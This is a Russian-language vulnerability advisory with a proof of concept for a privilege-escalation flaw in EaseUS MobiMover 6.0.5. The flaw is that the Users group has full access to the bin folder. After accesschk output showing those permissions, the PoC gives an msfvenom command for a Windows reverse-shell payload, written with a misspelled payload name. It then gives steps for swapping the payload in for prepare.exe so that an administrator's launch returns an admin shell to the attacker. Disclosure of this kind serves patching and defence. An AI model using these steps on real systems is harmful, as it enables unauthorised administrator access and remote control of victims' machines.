
EaseUS MobiMover 6.0.5 Build 21620 - Небезопасные права доступа к файлам и папкам
MobiMoverUILaunch.exe страдает от уязвимости повышения привилегий, которая может быть использована «Аутентифицированным пользователем» для изменения исполняемого файла службы на двоичный файл по его выбору в папке bin. Уязвимость существует из-за слабого набора разрешений, предоставленных «Группе аутентифицированных пользователей», которая предоставляет флаг (M), то есть «Право на изменение».

Домашняя страница поставщика: https://www.easeus.com/
Ссылка на программное обеспечение: https://down.easeus.com/product/mobimover_trial_setup
Google Диск: https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Видео PoC: https://www.youtube.com/watch?v=FR4cQm-z4Gw
#PoC
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
FILE_ALL_ACCESS
RW NT SERVICE\TrustedInstaller
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
Создайте вредоносный двоичный файл на Kali Linux с помощью msfvenom
msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe
Передайте созданный файл «prepare.exe» на хост Windows с Kali от имени пользователя с низким уровнем доступа
Переместите созданный двоичный файл «prepare.exe» в «C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe», чтобы заменить старый, от имени пользователя с низким уровнем доступа
Когда администратор запустит приложение, вы получите обратную оболочку с правами администратора